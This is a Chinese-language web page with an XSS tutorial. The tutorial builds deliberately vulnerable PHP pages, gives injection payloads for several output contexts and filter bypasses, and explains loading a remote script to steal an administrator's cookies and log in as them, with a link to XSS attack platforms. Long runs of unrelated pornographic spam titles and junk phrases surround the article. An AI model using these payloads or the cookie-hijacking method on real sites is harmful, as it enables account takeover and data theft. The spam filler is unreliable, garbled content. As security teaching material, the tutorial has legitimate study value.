精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

XSS的原理分析與解剖

安全 應(yīng)用安全
xss是一門又熱門又不太受重視的Web攻擊手法,為什么會(huì)這樣呢,原因有下:耗時(shí)間、有一定幾率不成功、沒有相應(yīng)的軟件來完成自動(dòng)化攻擊、是一種被動(dòng)的攻擊手法等。

0×01 前言:

[[118026]]

《xss攻擊手法》一開始在互聯(lián)網(wǎng)上資料并不多(都是現(xiàn)成的代碼,沒有從基礎(chǔ)的開始),直到刺的《白帽子講WEB安全》和cn4rry的《XSS跨站腳本攻擊剖析與防御》才開始好轉(zhuǎn)。

我這里就不說什么xss的歷史什么東西了,xss是一門又熱門又不太受重視的Web攻擊手法,為什么會(huì)這樣呢,原因有下:

1、耗時(shí)間
2、有一定幾率不成功
3、沒有相應(yīng)的軟件來完成自動(dòng)化攻擊
4、前期需要基本的html、js功底,后期需要扎實(shí)的html、js、actionscript2/3.0等語言的功底
5、是一種被動(dòng)的攻擊手法
6、對website有http-only、crossdomian.xml沒有用

但是這些并沒有影響黑客對此漏洞的偏愛,原因不需要多,只需要一個(gè)。

Xss幾乎每個(gè)網(wǎng)站都存在,google、baidu、360等都存在。

0×02 原理:

首先我們現(xiàn)在本地搭建個(gè)PHP環(huán)境(可以使用phpstudy安裝包安裝),然后在index.php文件里寫入如下代碼:

  1. <html> 
  2. <head> 
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
  4. <title>XSS原理重現(xiàn)</title> 
  5. </head> 
  6. <body> 
  7. <form action="" method="get"> 
  8. <input type="text" name="xss_input"> 
  9. <input type="submit"> 
  10. </form> 
  11. <hr> 
  12. <?php 
  13. $xss = $_GET['xss_input'];  
  14. echo '你輸入的字符為<br>'.$xss;  
  15. ?> 
  16. </body> 
  17. </html> 
  18.  

然后,你會(huì)在頁面看到這樣的頁面

XSS的原理分析與解剖

我們試著輸入abcd123,得到的結(jié)果為

XSS的原理分析與解剖

我們在看看源代碼

XSS的原理分析與解剖

我們輸入的字符串被原封不動(dòng)的輸出來了,那這里我們提出來一個(gè)假設(shè),假設(shè)我們在搜索框輸入下面的代碼會(huì)出現(xiàn)什么呢?

  1. <script>alert('xss')</script> 

如果按照上面的例子來說,它應(yīng)該存在第12行的[br]與[/boby]>之間,變成:

  1. <br><script>alert('xss')</script></boby> 

之后,應(yīng)該會(huì)彈出對話框。

既然假設(shè)提出來,那我們來實(shí)現(xiàn)下這個(gè)假設(shè)成不成立吧。

我們輸入

  1. <script>alert('xss')</script> 

得到的頁面為

XSS的原理分析與解剖

成功彈窗,這個(gè)時(shí)候基本上就可以確定存在xss漏洞。

我們在看看源代碼

XSS的原理分析與解剖

看來,我們的假設(shè)成功了,這節(jié)就說說XSS的原理,下面幾節(jié)說說xss的構(gòu)造和利用。

#p#

0×03 xss利用輸出的環(huán)境來構(gòu)造代碼 :

上節(jié)說了xss的原理,但是我們的輸出點(diǎn)不一在[ br ]和[ /boby ]里,可以出現(xiàn)在html標(biāo)簽的屬性里,或者其他標(biāo)簽里面。所以這節(jié)很重要,因?yàn)椴灰欢?當(dāng)你輸入下面代碼就會(huì)出現(xiàn)彈窗。 

  1. <script>alert('xss')</script> 

先貼出代碼:

  1. <html> 
  2. <head> 
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
  4. <title>XSS利用輸出的環(huán)境來構(gòu)造代碼</title> 
  5. </head> 
  6. <body> 
  7. <center> 
  8. <h6>把我們輸入的字符串 輸出到input里的value屬性里</h6> 
  9. <form action="" method="get"> 
  10. <h6>請輸入你想顯現(xiàn)的字符串</h6> 
  11. <input type="text" name="xss_input_value" value="輸入"><br> 
  12. <input type="submit"> 
  13. </form> 
  14. <hr> 
  15. <?php 
  16. $xss = $_GET['xss_input_value'];  
  17. if(isset($xss)){  
  18. echo '<input type="text" value="'.$xss.'">';  
  19. }else{  
  20. echo '<input type="type" value="輸出">';  
  21. }  
  22. ?> 
  23. </center> 
  24. </body> 
  25. </html> 

下面是代碼的頁面

XSS的原理分析與解剖

這段代碼的作用是把第一個(gè)輸入框的字符串,輸出到第二個(gè)輸入框,我們輸入1,那么第二個(gè)input里的value值就是1,下面是頁面的截圖和源代碼的截圖(這里我輸入下面的代碼來測試)

  1. <script>alert('xss')</script> 

XSS的原理分析與解剖 

XSS的原理分析與解剖

明顯的可以看到,并沒有彈出對話框,大家可能會(huì)疑惑為什么沒有彈窗呢,我們來看看源代碼

XSS的原理分析與解剖

我們看到我們輸入的字符串被輸出到第15行input標(biāo)簽里的value屬性里面,被當(dāng)成value里的值來顯現(xiàn)出來,所以并沒有彈窗,這時(shí)候我們該怎么辦呢?聰明的人已經(jīng)發(fā)現(xiàn)了可以在

  1. <script>alert(&#039;xss&#039;)</script> 

前面加個(gè)">來閉合input標(biāo)簽。所以應(yīng)該得到的結(jié)果為

XSS的原理分析與解剖

成功彈窗了,我們在看看這時(shí)的頁面

XSS的原理分析與解剖

看到后面有第二個(gè)input輸入框后面跟有">字符串,為什么會(huì)這樣呢,我們來看看源代碼

XSS的原理分析與解剖

這時(shí)可以看到我們構(gòu)造的代碼里面有兩個(gè)">,第一個(gè)">是為了閉合input標(biāo)簽,所以第二個(gè)">就被拋棄了,因?yàn)閔tml的容錯(cuò)性高,所以并沒有像php那樣出現(xiàn)錯(cuò)誤,而是直接把多余的字符串來輸出了,有的人是個(gè)完美主義者,不喜歡有多余的字符串被輸出,這時(shí)該怎么辦呢?

這里我問大家一個(gè)問題,我之前說的xss代碼里,為什么全是帶有標(biāo)簽的。難道就不能不帶標(biāo)簽么?!答:當(dāng)然可以。既然可以不用標(biāo)簽,那我們就用標(biāo)簽里的屬性來構(gòu)造XSS,這樣的話,xss代碼又少,又不會(huì)有多余的字符串被輸出來。

還是這個(gè)環(huán)境,但是不能使用標(biāo)簽,你應(yīng)該怎么做。想想input里有什么屬性可以調(diào)用js,html學(xué)的好的人,應(yīng)該知道了,on事件,對的。我們可以用on事件來進(jìn)行彈窗,比如這個(gè)xss代碼 我們可以寫成

  1. onclick="alert(&#039;xss&#039;)  

這時(shí),我們在來試試,頁面會(huì)發(fā)生什么樣的變化吧。

XSS的原理分析與解剖

沒有看到彈窗啊,失敗了么?答案當(dāng)然是錯(cuò)誤的,因?yàn)閛nclick是鼠標(biāo)點(diǎn)擊事件,也就是說當(dāng)你的鼠標(biāo)點(diǎn)擊第二個(gè)input輸入框的時(shí)候,就會(huì)觸發(fā)onclick事件,然后執(zhí)行alert(&#039;xss&#039;)代碼。我們來試試看

XSS的原理分析與解剖

當(dāng)我點(diǎn)擊后,就出現(xiàn)了彈窗,這時(shí)我們來看看源代碼吧

XSS的原理分析與解剖

第15行,value值為空,當(dāng)鼠標(biāo)點(diǎn)擊時(shí),就會(huì)彈出對話框。這里可能就會(huì)有人問了,如果要點(diǎn)擊才會(huì)觸發(fā),那不是很麻煩么,成功率不就又下降了么。我來幫你解答這個(gè)問題,on事件不止onclick這一個(gè),還有很多,如果你想不需要用戶完成什么動(dòng)作就可以觸發(fā)的話,i可以把onclick改成

Onmousemove 當(dāng)鼠標(biāo)移動(dòng)就觸發(fā)

Onload 當(dāng)頁面加載完成后觸發(fā)

還有很多,我這里就不一一說明了,有興趣的朋友可以自行查詢下。

別以為就這樣結(jié)束了,還有一類環(huán)境不能用上述的方法,

那就是如果在[ textarea ]標(biāo)簽里呢?!或者其他優(yōu)先級比script高的呢?

就下面這樣

XSS的原理分析與解剖

這時(shí)我們該怎么辦呢?既然前面都說了閉合屬性和閉合標(biāo)簽了,那能不能閉合完整的標(biāo)簽?zāi)兀鸢甘强隙ǖ摹N覀兛梢暂斎胂旅娴拇a就可以實(shí)現(xiàn)彈窗了。

  1. </textarea><script>alert('xss')</script> 

#p#

0×04 過濾的解決辦法

假如說網(wǎng)站禁止過濾了script 這時(shí)該怎么辦呢,記住一句話,這是我總結(jié)出來的“xss就是在頁面執(zhí)行你想要的js”不用管那么多,只要能運(yùn)行我們的js就OK,比如用img標(biāo)簽或者a標(biāo)簽。我們可以這樣寫

  1. <img scr=1 onerror=alert('xss')>當(dāng)找不到圖片名為1的文件時(shí),執(zhí)行alert('xss')  
  2. <a href=javascrip:alert('xss')>s</a> 點(diǎn)擊s時(shí)運(yùn)行alert('xss')  
  3. <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗  
  4. <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執(zhí)行彈窗   

等等有很多的方法,不要把思想總局限于一種上面,記住一句話“xss就是在頁面執(zhí)行你想要的js”其他的管他去。(當(dāng)然有的時(shí)候還有管他…)

0×05 xss的利用

說了那么多,大家可能都以為xss就是彈窗,其實(shí)錯(cuò)了,彈窗只是測試xss的存在性和使用性。

這時(shí)我們要插入js代碼了,怎么插呢?

你可以這樣

  1. <script scr="js_url"></script> 

也可以這樣

  1. <img src=x onerror=appendChild(createElement('script')).src='js_url' /> 

各種姿勢,各種插,只要鞥運(yùn)行我們的js就OK。那運(yùn)行我們的js有什么用呢?

Js可以干很多的事,可以獲取cookies(對http-only沒用)、控制用戶的動(dòng)作(發(fā)帖、私信什么的)等等。

比如我們在網(wǎng)站的留言區(qū)輸入下面的代碼:

  1. <script scr="js_url"></script> 

當(dāng)管理員進(jìn)后臺瀏覽留言的時(shí)候,就會(huì)觸發(fā),然后管理員的cookies和后臺地址還有管理員瀏覽器版本等等你都可以獲取到了,再用“桂林老兵cookie欺騙工具”來更改你的cookies,就可以不用輸入賬號 密碼 驗(yàn)證碼 就可以以管理員的方式來進(jìn)行登錄了。

至于不會(huì)js的怎么寫js代碼呢,放心網(wǎng)上有很多xss平臺,百度一下就可以看到了。頁面是傻瓜式的操作,這里就不再過多的說明了。

有興趣的朋友,下面是cn4rry給我的幾個(gè)xss平臺,大家可以自己鉆研與研究,也可以自己搭建

http://pan.baidu.com/s/1ntqOp4X

在發(fā)布此文章的時(shí)候,我特地和cn4rry談了一下,得到的結(jié)果是,我會(huì)繼續(xù)寫這個(gè)系列的。當(dāng)我把這個(gè)doc發(fā)給cn4rry的時(shí)候,他就直接來句“嗯 寫的比較基礎(chǔ)”,我本來的打算是寫一個(gè)xss入門的就可以了,我只是感覺 現(xiàn)在網(wǎng)上的文章從簡單開始介紹xss的比較少,都是在書里有

所以 我想在網(wǎng)上把他講的細(xì)點(diǎn) xss入門就可以了,后面的路 就可以自己摸索了

但是和他談過后,感覺還是要繼續(xù)寫下去,因?yàn)?ldquo;xss盲打”“xss編碼繞過”“fuzzing xss”等等,如果是自己慢慢琢磨的話,需要較長的時(shí)間,所以我打算每過一段時(shí)間就會(huì)推出下一個(gè)xss的文章,寫個(gè)系列出來。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2015-10-14 14:11:45

HTTP網(wǎng)絡(luò)協(xié)議

2010-08-30 11:08:53

DIV+CSS

2010-09-30 10:55:19

2023-02-07 09:17:19

Java注解原理

2022-06-08 10:17:51

服務(wù)管理通信

2015-11-10 11:00:58

2021-07-12 09:17:54

Memory Comp系統(tǒng)內(nèi)存

2013-05-02 13:16:21

產(chǎn)品經(jīng)理案例分析移動(dòng)應(yīng)用

2011-08-30 14:48:02

2019-03-25 07:27:14

XSS漏洞Ecshop

2023-11-29 16:21:30

Kubernetes服務(wù)注冊

2025-08-04 03:05:00

2025-08-04 02:15:00

2016-09-29 14:03:06

2013-04-07 10:11:27

2011-01-11 16:11:03

2010-04-20 11:31:26

Oracle邏輯結(jié)構(gòu)

2009-11-24 09:39:55

SUSE Linux

2013-12-09 14:36:20

2009-07-24 13:54:39

MVVM模式
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

久久久久毛片| 日中文字幕在线| 伊人久久大香线蕉av超碰演员| 欧美不卡一二三| 黄色动漫在线免费看| 91在线高清| 成人一区二区三区中文字幕| 奇米4444一区二区三区 | 粉嫩一区二区三区在线观看| 亚洲国产日韩a在线播放| 色狠狠久久av五月综合|| 国内精品久久久久久久久久 | 亚洲视频一二三区| 久久大片网站| 99国产精品欲| 老司机久久99久久精品播放免费| 久久精品国亚洲| 国产 欧美 在线| 粉嫩久久久久久久极品| 欧美精品在线视频| 九色porny91| 九色porny丨入口在线| 亚洲人精品一区| 日韩国产在线一区| 欧美一区二区公司| 黑人精品欧美一区二区蜜桃| 日本精品中文字幕| 久久一二三四区| 天天做综合网| 丝袜一区二区三区| av男人的天堂av| 久久97精品| 91精品在线观看入口| 日韩视频在线免费看| 成人av影院在线观看| 亚洲美女屁股眼交3| 日本一区二区三区www| 五月婷中文字幕| 高清不卡在线观看| 91亚洲精品丁香在线观看| 亚洲图片视频小说| 日韩成人一区二区三区在线观看| 69av在线播放| 中日韩精品视频在线观看| 伊人久久大香线蕉综合四虎小说| 深夜福利一区二区| 久久日免费视频| 欧美呦呦网站| 伊人激情综合网| 国产精品无码久久久久一区二区| 欧美三级午夜理伦三级小说| 亚洲第一黄色网| av av在线| 你懂的在线观看一区二区| 亚洲成人性视频| 国产精品手机在线观看| 伦理一区二区| 日韩av一区在线观看| 亚洲制服丝袜在线播放| 爽爽窝窝午夜精品一区二区| 国产视频在线一区二区| 在线观看国产免费视频| 日韩成人午夜| 亚洲欧美国产另类| 无码人妻精品一区二区中文| 精品欧美激情在线观看| 一区二区三区黄色| 九九热视频在线免费观看| 一区二区在线| 97国产精品久久| www.国产com| 七七婷婷婷婷精品国产| 国产日韩欧美中文| а√天堂资源在线| 成人av一区二区三区| 久久久久久99| 成人精品一区二区三区校园激情| 中文字幕一区二区三区在线观看| 精品国产一区二区三区在线| 久久av色综合| 色婷婷亚洲综合| 国产又黄又猛的视频| 日本成人手机在线| 亚洲国产精品久久久久秋霞蜜臀| www在线观看免费视频| 亚洲91视频| 97精品在线观看| 中文字幕在线视频第一页| 国产乱码精品1区2区3区| 狠狠色综合色区| 天堂资源在线中文| 亚洲韩国一区二区三区| 嫩草av久久伊人妇女超级a| 伊人久久综合网另类网站| 亚洲国产成人精品女人久久久| 成人乱码一区二区三区av| 五月激情久久久| 欧美一级淫片aaaaaaa视频| 在线观看国产一区二区三区| 国产91丝袜在线18| 日韩精品最新在线观看| 欧洲黄色一区| 欧美日韩精品电影| 精品人妻一区二区三区香蕉 | 中文字幕久久网| 岛国一区二区在线观看| 五月天久久综合网| av中文字幕在线看| 4438x成人网最大色成网站| 亚洲熟女乱综合一区二区三区| 91视频精品| 91av国产在线| 亚洲av综合色区无码一二三区| 久久久国产午夜精品| 久久www视频| 欧洲成人一区| 日韩高清有码在线| 欧美人妻一区二区| 另类小说一区二区三区| 久久久久久九九九九| av片在线观看| 欧美日韩国产高清一区二区 | 国产人妻精品一区二区三| 26uuuu精品一区二区| 日韩欧美视频免费在线观看| 日韩专区视频网站| 国产一区二区三区在线观看视频| 国产一卡二卡在线| 国产91精品免费| 91xxx视频| 亚洲国产伊人| 中文字幕在线日韩| 中文字幕 视频一区| 久久午夜国产精品| 日本韩国欧美在线观看| jizz18欧美18| 欧美激情videos| 99免费在线视频| 日韩一区日韩二区| 成人黄色一级大片| 国产精品久久久久久麻豆一区软件| 国产91色在线|免| 精品亚洲综合| 在线免费av一区| 天天躁夜夜躁狠狠是什么心态| 麻豆精品91| 日本一区二区三区四区高清视频| 免费电影日韩网站| 国产一区二区三区丝袜| www.五月婷婷.com| 国产精品无码永久免费888| 欧美 国产 小说 另类| 丝袜美腿一区二区三区动态图| 91精品国产电影| 日本大片在线观看| 色视频欧美一区二区三区| av女人的天堂| 久久精品免费看| 中文字幕久精品免| 亚洲超碰在线观看| 97视频网站入口| 毛片在线播放网站| 欧美日韩专区在线| 手机av在线看| 国产成人在线免费观看| 日韩中字在线观看| 天天做夜夜做人人爱精品| 日韩美女福利视频| 91这里只有精品| 日韩女优制服丝袜电影| 精品久久免费视频| 国产亚洲欧美一区在线观看| 亚洲欧美日本一区二区三区| 91精品91| 久久人人爽爽人人爽人人片av| 中文字幕av一区二区三区佐山爱| 一本一本久久a久久精品综合小说 一本一本久久a久久精品牛牛影视 | 成人手机在线播放| 精品成人自拍视频| 国产精品v片在线观看不卡| 在线毛片网站| 亚洲第一精品夜夜躁人人爽| 波多野结衣爱爱| 亚洲品质自拍视频| 污污内射在线观看一区二区少妇| 久久中文在线| 喜爱夜蒲2在线| 日韩极品在线| 国产视频福利一区| av在线私库| 综合久久五月天| 亚洲国产精品久久久久久6q| 色综合久久中文字幕综合网 | 精品成人乱色一区二区| www.日本高清视频| 国产99久久精品| 99视频精品免费| 国产精品mm| 视频一区视频二区视频| 91精品导航| 国产日韩欧美另类| 91www在线| 久久亚洲精品国产亚洲老地址| 香蕉视频成人在线| 欧美一二三四区在线| 无码任你躁久久久久久久| 一区二区三区小说| 毛片视频免费播放| 99久久国产综合精品女不卡| 国产永久免费网站| 天使萌一区二区三区免费观看| 国产黄色激情视频| 天天久久综合| 日韩精彩视频| 欧美激情极品| 999视频在线免费观看| 久久精品女人天堂av免费观看| 欧美高清视频免费观看| 在线观看av的网站| 亚洲人成网站色ww在线| 天天综合网天天综合| 日韩一区二区精品在线观看| 中文字幕在线观看你懂的| 日韩欧美高清在线视频| 国产午夜视频在线播放| 一区二区三区四区高清精品免费观看 | 亚洲午夜无码久久久久| 欧美体内谢she精2性欧美| 国产在线欧美在线| 有坂深雪av一区二区精品| 成人欧美一区二区三区黑人一| 久久人人超碰精品| 久久久久久久久免费看无码| 成人免费电影视频| 日本泡妞xxxx免费视频软件| 激情五月婷婷综合网| 黄色手机在线视频| 毛片一区二区三区| 91极品视频在线观看| 日本欧美韩国一区三区| 亚洲高清在线免费观看| 快she精品国产999| 粉嫩虎白女毛片人体| 亚洲一区国产一区| av免费观看网| 蜜乳av另类精品一区二区| 欧美黄色免费影院| 亚洲欧美日韩在线观看a三区 | 亚洲成人生活片| 亚洲精品免费播放| 久久久久久免费观看| 亚洲国产一区二区三区青草影视| 久久99久久98精品免观看软件| 亚洲最快最全在线视频| 国产精品成人av久久| 婷婷久久综合九色综合绿巨人| 丰满少妇乱子伦精品看片| 欧美日韩国产精品一区二区三区四区 | 色噜噜狠狠成人中文综合| 亚洲婷婷久久综合| 欧美日韩另类一区| jlzzjlzz亚洲女人18| 日韩欧美国产电影| 五月婷婷深深爱| 一本色道久久综合狠狠躁篇怎么玩| jizz在线观看中文| 久久国产一区二区三区| 成视频免费观看在线看| 欧美丰满少妇xxxxx| 日本不良网站在线观看| 国产精品成人免费视频| 亚洲热av色在线播放| 91在线播放视频| 偷拍一区二区| 在线国产99| 国内精品久久久久久久97牛牛| 国产在线播放观看| 日韩黄色在线观看| 女王人厕视频2ⅴk| 久久欧美一区二区| 99热在线观看精品| 亚洲高清在线精品| 欧美一级黄视频| 日韩欧美视频一区| 国产一级片在线| 欧美精品一区二区免费| 忘忧草在线影院两性视频| 91精品免费久久久久久久久| 91精品国产自产精品男人的天堂 | 国产一区电影| 九九精品在线播放| 蜜桃精品在线| 国产伦精品一区二区三区视频孕妇| 一区二区小说| 超碰97在线看| 琪琪一区二区三区| 日本三级日本三级日本三级极| 中文字幕欧美日本乱码一线二线| 欧美精品99久久久| 欧美一a一片一级一片| 亚洲精品一区二区三区新线路 | 99免费在线观看视频| 国产一区不卡| 亚洲人成无码网站久久99热国产| 奇米精品一区二区三区在线观看| 91精品又粗又猛又爽| 国产精品久久久99| www.久久精品视频| 亚洲成人网在线| av片在线观看网站| 国产噜噜噜噜久久久久久久久| 免费观看成人www动漫视频| 国产一区一区三区| 日本欧美一区二区在线观看| 国产成人精品无码片区在线| 亚洲精品日韩专区silk| 中文字幕+乱码+中文乱码91| 日韩精品免费在线视频观看| 2020国产在线视频| 国产欧美日韩中文字幕在线| 九九热精品视频在线观看| 免费看欧美一级片| 国产精品一色哟哟哟| 手机av在线不卡| 色婷婷综合五月| 色av男人的天堂免费在线| 久久久久久久电影一区| 日韩精品久久久久久久软件91| 亚洲欧美日韩国产yyy| 日韩影院精彩在线| 黄色工厂在线观看| 欧美日韩人人澡狠狠躁视频| 三级小视频在线观看| 久久久久久久久久婷婷| 日韩精品一区国产| 欧美日韩中文字幕在线播放| 激情欧美一区二区| 91九色丨porny丨极品女神| 欧美日韩精品综合在线| 91看片在线观看| 国产精品免费观看在线| 成人综合一区| 国产九九热视频| 国产精品久久久久久久久久久免费看| 波多野结衣一区二区在线| 亚洲老头同性xxxxx| 亚洲女色av| 日本黑人久久| 日韩高清欧美激情| 97人妻人人揉人人躁人人| 色999日韩国产欧美一区二区| 国产一区二区三区不卡在线| 国产精品久久久久久久久久尿| 精品久久成人| 天天综合网久久| 中文字幕在线观看一区二区| 国产巨乳在线观看| 欧美成人精品在线观看| 白嫩白嫩国产精品| 欧美牲交a欧美牲交| 久久夜色精品国产噜噜av| 无码人妻丰满熟妇区五十路| 有码中文亚洲精品| 精品一区91| 你真棒插曲来救救我在线观看| 91亚洲精品久久久蜜桃网站| 无码人妻久久一区二区三区| 中文字幕亚洲天堂| 亚洲一级大片| avav在线看| 国产精品久久久久aaaa| 亚洲高清视频网站| 51ⅴ精品国产91久久久久久| 波多野结衣在线观看一区二区 | 色诱色偷偷久久综合| 日本高清视频免费在线观看| av在线不卡电影| 伊人久久亚洲综合| 九九视频直播综合网| 丝袜美腿综合| xxx国产在线观看| 一区二区三区欧美视频| 青青草视频在线观看| 国产一区二区丝袜| 最新日韩欧美| 成人免费视频入口| 欧美sm极限捆绑bd| 桃子视频成人app| 免费人成自慰网站| 日本一区二区三区久久久久久久久不 | 新67194成人永久网站| 国产精品视频一区二区在线观看| 亚洲福利小视频| 亚洲欧洲日韩精品在线| 国产极品在线视频| av在线网站观看| 日韩一区二区三区视频在线 | 色菇凉天天综合网| 欧美黑人猛交| 天堂精品一区二区三区|